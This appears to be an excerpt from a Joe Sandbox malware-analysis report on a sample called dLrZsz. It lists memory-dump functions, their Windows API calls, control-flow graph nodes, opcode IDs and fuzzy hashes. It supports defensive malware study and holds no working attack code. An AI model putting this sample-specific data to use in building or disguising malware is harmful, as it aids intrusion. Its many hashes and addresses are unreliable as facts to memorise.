                                                                              • Opcode Fuzzy Hash: 5fca67a84ef64f855aa3d39dc8dcc24d833c29bd2a20a9f7776de5c7e38c67d2
                                                                              • Instruction Fuzzy Hash: 64817770A01B058FD724DF2AD44179ABBF1FF88314F00892DD48ADBA50D775E98ADB91
                                                                              Function 00F144B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 375 f144b4-f159d9 CreateActCtxA 378 f159e2-f15a3c 375->378 379 f159db-f159e1 375->379 386 f15a4b-f15a4f 378->386 387 f15a3e-f15a41 378->387 379->378 388 f15a51-f15a5d 386->388 389 f15a60 386->389 387->386 388->389 391 f15a61 389->391 391->391
                                                                              APIs
                                                                              • CreateActCtxA.KERNEL32(?), ref: 00F159C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1886670133.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_f10000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: Create
                                                                              • String ID:
                                                                              • API String ID: 2289755597-0
                                                                              • Opcode ID: 36cf9a0fc088d8f65ae9f840560c0b1d19fd4f79b1279f92f3ed65e2d9be7a29
                                                                              • Instruction ID: caf806987c407408ef9bc66d814b7bab5b7c3dbe05411a36a2135d552e1b3b00
                                                                              • Opcode Fuzzy Hash: 36cf9a0fc088d8f65ae9f840560c0b1d19fd4f79b1279f92f3ed65e2d9be7a29
                                                                              • Instruction Fuzzy Hash: 4241F2B0C0061DCFDB24CFA9C884BCDBBB5BF88704F24816AD409AB251DB756985CF90
                                                                              Function 00F1590C Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 392 f1590c-f159d9 CreateActCtxA 394 f159e2-f15a3c 392->394 395 f159db-f159e1 392->395 402 f15a4b-f15a4f 394->402 403 f15a3e-f15a41 394->403 395->394 404 f15a51-f15a5d 402->404 405 f15a60 402->405 403->402 404->405 407 f15a61 405->407 407->407
                                                                              APIs
                                                                              • CreateActCtxA.KERNEL32(?), ref: 00F159C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1886670133.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_f10000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: Create
                                                                              • String ID:
                                                                              • API String ID: 2289755597-0
                                                                              • Opcode ID: cf85e70b6b510a4c9faf48842da4bb84458e2812248852d16523132d7f1934bd
                                                                              • Instruction ID: 5560bf7f85171d74332c04ec1f73d3430c8ad9699107d352e2b81863989088da
                                                                              • Opcode Fuzzy Hash: cf85e70b6b510a4c9faf48842da4bb84458e2812248852d16523132d7f1934bd
                                                                              • Instruction Fuzzy Hash: A641D2B0C0061DCFDB14CFA9C8847CDBBB5BF49704F2481AAD409AB255DB75698ACF90
                                                                              Function 00F1D27C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 408 f1d27c-f1d724 DuplicateHandle 410 f1d726-f1d72c 408->410 411 f1d72d-f1d74a 408->411 410->411
                                                                              APIs
                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F1D656,?,?,?,?,?), ref: 00F1D717
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1886670133.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_f10000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: DuplicateHandle
                                                                              • String ID:
                                                                              • API String ID: 3793708945-0
                                                                              • Opcode ID: c402b3cdd2dd4c01cea25aa8fff308d82e6322662a12e0747450069611b0472d
                                                                              • Instruction ID: 59f37c9361285c9a62f4fef237d83d5499f7789c3008188adfa11b70be27d3bc
                                                                              • Opcode Fuzzy Hash: c402b3cdd2dd4c01cea25aa8fff308d82e6322662a12e0747450069611b0472d
                                                                              • Instruction Fuzzy Hash: 4F2105B59002589FDB10CF9AD484ADEBBF4EB48314F14801AE918A3350C374A940CFA4
                                                                              Function 00F1D689 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 414 f1d689-f1d724 DuplicateHandle 415 f1d726-f1d72c 414->415 416 f1d72d-f1d74a 414->416 415->416
                                                                              APIs
                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F1D656,?,?,?,?,?), ref: 00F1D717
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1886670133.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_f10000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: DuplicateHandle
                                                                              • String ID:
                                                                              • API String ID: 3793708945-0
                                                                              • Opcode ID: d5162d772a218119783986ae49a55cffb5288b3eec94a1b43840f40730ef9fd0
                                                                              • Instruction ID: 62a8d3c1728b7b9ebeafeb08cff481a79cbc23db05df2a977c43d323f69742b5
                                                                              • Opcode Fuzzy Hash: d5162d772a218119783986ae49a55cffb5288b3eec94a1b43840f40730ef9fd0
                                                                              • Instruction Fuzzy Hash: 2C21E2B5900219DFDB10CFAAD584ADEBBF5FB48324F14802AE918A3250C378A950CFA4
                                                                              Function 00F1A130 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 419 f1a130-f1b260 421 f1b262-f1b265 419->421 422 f1b268-f1b297 LoadLibraryExW 419->422 421->422 423 f1b2a0-f1b2bd 422->423 424 f1b299-f1b29f 422->424 424->423
                                                                              APIs
                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F1B079,00000800,00000000,00000000), ref: 00F1B28A
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1886670133.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_f10000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 4d370e7f410d87f7005489e63528dd698f2b2ab1bca579b282d235fc6aa1c601
                                                                              • Instruction ID: 0725452144b75f42563b7d6b63c0fb7e4e51117a1b1161837eadeaf935f10026
                                                                              • Opcode Fuzzy Hash: 4d370e7f410d87f7005489e63528dd698f2b2ab1bca579b282d235fc6aa1c601
                                                                              • Instruction Fuzzy Hash: 001114B6D00248DFDB10CF9AD444ADEFBF5EB48320F10842AD819A7210C379A945CFA4
                                                                              Function 00F1B218 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 427 f1b218-f1b260 428 f1b262-f1b265 427->428 429 f1b268-f1b297 LoadLibraryExW 427->429 428->429 430 f1b2a0-f1b2bd 429->430 431 f1b299-f1b29f 429->431 431->430
                                                                              APIs
                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F1B079,00000800,00000000,00000000), ref: 00F1B28A
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1886670133.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_f10000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 3139add497fcd46cbe5e63081972016b035a7a0becfc72574a003fd7edf854f6
                                                                              • Instruction ID: a26c35eda808d269d1f7d0fa90a16966b58a34e9e37d1c900dd11ac991f9d6f6
                                                                              • Opcode Fuzzy Hash: 3139add497fcd46cbe5e63081972016b035a7a0becfc72574a003fd7edf854f6
                                                                              • Instruction Fuzzy Hash: B61123B6D00248CFDB20CFAAC444ADEFBF4EB88320F14842AD859A7310C379A545CFA5
                                                                              Function 00F1AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 434 f1af98-f1afd8 435 f1afe0-f1b00b GetModuleHandleW 434->435 436 f1afda-f1afdd 434->436 437 f1b014-f1b028 435->437 438 f1b00d-f1b013 435->438 436->435 438->437
                                                                              APIs
                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00F1AFFE
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1886670133.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_f10000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule
                                                                              • String ID:
                                                                              • API String ID: 4139908857-0
                                                                              • Opcode ID: 9a30774b074657493cb5bfc0ca685cecabf22dddf84189cc4646b2b05617a1ce
                                                                              • Instruction ID: 6d45a4e40db69e3b0cc2acb364957a5bbc7e158df40f818ea1e6e1e4f741a242
                                                                              • Opcode Fuzzy Hash: 9a30774b074657493cb5bfc0ca685cecabf22dddf84189cc4646b2b05617a1ce
                                                                              • Instruction Fuzzy Hash: C511E0B5C00649CFCB10CF9AC444ADEFBF4EB88324F14846AD869A7210D379A585CFA5
                                                                              Function 00EBD63C Relevance: .1, Instructions: 77COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1859551028.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_ebd000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 682ad310514b634cde096bfb9a0b3a424c03d6b60a21c876cb1c8cb17dd1cb6d
                                                                              • Instruction ID: 39c834c1f4f71a43ab880112a72b2dc3733a8abc4815369fad3e641b86cebe8b
                                                                              • Opcode Fuzzy Hash: 682ad310514b634cde096bfb9a0b3a424c03d6b60a21c876cb1c8cb17dd1cb6d
                                                                              • Instruction Fuzzy Hash: 13213671108240DFCB059F14DDC0B97BFA5FB98318F248269E9096B25AD336D816CB61
                                                                              Function 00EBD4C4 Relevance: .1, Instructions: 75COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1859551028.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_ebd000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2b82a9b6b87dc0866fd3a1970e6fc263eb814c408705ad5cfa6066e308b20e0d
                                                                              • Instruction ID: fcddf703a9349d04e4230fb0e781c9dfa23f8c1102cd94d1ed939f3c377485e8
                                                                              • Opcode Fuzzy Hash: 2b82a9b6b87dc0866fd3a1970e6fc263eb814c408705ad5cfa6066e308b20e0d
                                                                              • Instruction Fuzzy Hash: 38214271508200DFCB21DF14DDC0BABBF65FB98328F20C169E8092B256D336D856CAA2
                                                                              Function 00EBD3D8 Relevance: .1, Instructions: 75COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1859551028.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_ebd000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: df4943974d7d780822569b51463e4f9e54c7a5eff1bc3167219abb438dd1f2b8
                                                                              • Instruction ID: ca1da9ea2b3744866d0e49625da0b222f635497857c470b8d0544ef1d3569918
                                                                              • Opcode Fuzzy Hash: df4943974d7d780822569b51463e4f9e54c7a5eff1bc3167219abb438dd1f2b8
                                                                              • Instruction Fuzzy Hash: 39216A71108204DFCB05DF04CDC0B97BF65FB94324F20C569D9095B256D336E856C7A2
                                                                              Function 00ECD01C Relevance: .1, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1865807171.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_ecd000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bd7c3e0a6624bc2ba89386852103b2718c36f64f27164584422dfd329a74fdb3
                                                                              • Instruction ID: 7446f4f53d7b0fe3d51f6691657911bc563cb54e737fb7d1940442c01771d386
                                                                              • Opcode Fuzzy Hash: bd7c3e0a6624bc2ba89386852103b2718c36f64f27164584422dfd329a74fdb3
                                                                              • Instruction Fuzzy Hash: 6421D071608200DFCB14DF18DA85F26BBA6EB84318F20C57DD84A5B296C33BD847CA61
                                                                              Function 00ECD005 Relevance: .1, Instructions: 62COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1865807171.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_ecd000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b8aedd7cbeab677774652dee1086b2ed8164674e36b38308e414e1189880379d
                                                                              • Instruction ID: a186f1e2dcfa1b23b04973e168f98cbe4d715498ec9d81f49ecbe47b42b09b0c
                                                                              • Opcode Fuzzy Hash: b8aedd7cbeab677774652dee1086b2ed8164674e36b38308e414e1189880379d
                                                                              • Instruction Fuzzy Hash: FA2141755093809FD712CF24D994B15BF71EB46214F28C5EAD8498B6A7C33B980BCB62
                                                                              Function 00EBD637 Relevance: .1, Instructions: 58COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1859551028.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_ebd000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                                              • Instruction ID: 2ae1853d61cc03443e2f63cfd15f7389000671b0f882c74ac9679a9215f7bece
                                                                              • Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                                              • Instruction Fuzzy Hash: 9721A276504280DFCB06CF10D9C4B56BF72FB98318F24C6A9DD491B656D33AD416CB91
                                                                              Function 00EBD4BF Relevance: .1, Instructions: 56COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1859551028.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_ebd000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                              • Instruction ID: d1cab32ab8f8e7032dbd9c04389481dffaf37a594e5c08132881fe56ae0aa2c7
                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                              • Instruction Fuzzy Hash: 16112672404280CFCB12CF10D9C4B56BF71FB94328F24C6A9DC090B256C33AD85ACBA1
                                                                              Function 00EBD3D3 Relevance: .1, Instructions: 56COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1859551028.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_ebd000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                              • Instruction ID: ba28517d009e19efe05632fac893084c1615bc2d615442c0594bc7bbc842a2dc
                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                              • Instruction Fuzzy Hash: AF112672404240CFCB12CF00D9C4B56BF71FB94328F24C6A9DD090B256C33AE85ACBA2
                                                                              Function 00EBD7B1 Relevance: .0, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1859551028.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_ebd000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: aeb02549dc407b5aaf497e7b6f519f3f226f5a424c1b99549b5d762b691bcd18
                                                                              • Instruction ID: 123bbe6a4a23e26e3663d6a68dc09868cb63b32871d232ddac70874f1de7775d
                                                                              • Opcode Fuzzy Hash: aeb02549dc407b5aaf497e7b6f519f3f226f5a424c1b99549b5d762b691bcd18
                                                                              • Instruction Fuzzy Hash: FA01267100D3449AE7148E2ACDC4BE7BF9CEF40329F18C56AED096B282E679D840C6B1
                                                                              Function 00EBD7B0 Relevance: .0, Instructions: 36COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1859551028.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_ebd000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6bbe7893f908696ce584de2505d26667593145ff430f99c569ca65fb086ea535
                                                                              • Instruction ID: 5e8449958262b260bfe2be830020b59ebf1092b7226aae798dd852781efdf704
                                                                              • Opcode Fuzzy Hash: 6bbe7893f908696ce584de2505d26667593145ff430f99c569ca65fb086ea535
                                                                              • Instruction Fuzzy Hash: FEF0C272409344AEEB148E16CDC4BA3FFA8EB50739F18C45AED085F282D2799844CAB0

                                                                              Execution Graph

                                                                              Execution Coverage:0%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:1
                                                                              Total number of Limit Nodes:0
                                                                              execution_graph 61786 1532c1d LdrInitializeThunk

                                                                              Executed Functions

                                                                              Function 01532C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 1532c0a-1532c0f 1 1532c11-1532c18 0->1 2 1532c1f-1532c26 LdrInitializeThunk 0->2
                                                                              APIs
                                                                              • LdrInitializeThunk.NTDLL(0154FD4F,000000FF,00000024,015E6634,00000004,00000000,?,-00000018,7D810F61,?,?,01508B12,?,?,?,?), ref: 01532C24
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 4f53288fd163a2ebb683ce401d91993a9f1757272b870896c027f7afa48c8d24
                                                                              • Instruction ID: 950850ffdf38b190c5dfd0f4be7f84e7c196f48cdbb7c6a26ccfb9177d7bf208
                                                                              • Opcode Fuzzy Hash: 4f53288fd163a2ebb683ce401d91993a9f1757272b870896c027f7afa48c8d24
                                                                              • Instruction Fuzzy Hash: 29B09B719019C5D6DA11F7A5460871B7A5077D0715F19C461D2030B41F4778D1D1E275
                                                                              Function 01532DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 5 1532df0-1532dfc LdrInitializeThunk
                                                                              APIs
                                                                              • LdrInitializeThunk.NTDLL(0156E73E,0000005A,015CD040,00000020,00000000,015CD040,00000080,01554A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,0153AE00), ref: 01532DFA
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 1253f9e095866d1bea63dba8114fd486d4c0e4531fc849e8178375d585a40ba1
                                                                              • Instruction ID: 78ac999c06f632d88473396045dbbff633e11e930c292c5eddadabd236447928
                                                                              • Opcode Fuzzy Hash: 1253f9e095866d1bea63dba8114fd486d4c0e4531fc849e8178375d585a40ba1
                                                                              • Instruction Fuzzy Hash: B490023120140413D111719945047070059A7D0255F99C812A0424958DD6E68A52A221
                                                                              Function 01532C1D Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 4 1532c1d-1532c26 LdrInitializeThunk
                                                                              APIs
                                                                              • LdrInitializeThunk.NTDLL(0154FD4F,000000FF,00000024,015E6634,00000004,00000000,?,-00000018,7D810F61,?,?,01508B12,?,?,?,?), ref: 01532C24
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 910faab85d9f27654beee6ff6be3154363d67fb071c64fdc4306c9454abfca09
                                                                              • Instruction ID: 9daad728468a2959e633c893a330c1646fa8145985dcc296d1534e25c79691bd
                                                                              • Opcode Fuzzy Hash: 910faab85d9f27654beee6ff6be3154363d67fb071c64fdc4306c9454abfca09
                                                                              • Instruction Fuzzy Hash: A4A00231411605478291BA56488946AB164BAD022534DC346D1064841A57B41491B6A6
                                                                              Function 015335C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 6 15335c0-15335cc LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 9f7dc2856ee371ea7ef120bcd6bfb1baaa6b1c651388297793aa20b5b3774330
                                                                              • Instruction ID: e8eff1221dcd7d2881a9ded410edc22ad766255445d6eef6db93c42cd6e87432
                                                                              • Opcode Fuzzy Hash: 9f7dc2856ee371ea7ef120bcd6bfb1baaa6b1c651388297793aa20b5b3774330
                                                                              • Instruction Fuzzy Hash: 1690023160550403D100719945147061055A7D0215F69C811A0424968DC7E58A5166A2
                                                                              Function 0042C001 Relevance: .0, Instructions: 27COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 7 42c001-42c037 10 42c03d-42c04b 7->10
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2048640803.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_42c000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1b8c77407e3df770313feec9b6e3edf85d36f4b9211376d07cb757514e6c501c
                                                                              • Instruction ID: 7ccc222256717fbe9da66e19fb99f99b4cedf2c9040dc8624fa9e7752e448d56
                                                                              • Opcode Fuzzy Hash: 1b8c77407e3df770313feec9b6e3edf85d36f4b9211376d07cb757514e6c501c
                                                                              • Instruction Fuzzy Hash: 60E02B71F84700ABD210E625EC82FEA73A8EB85304F50095EF29886080CB743A80C3D6

                                                                              Non-executed Functions

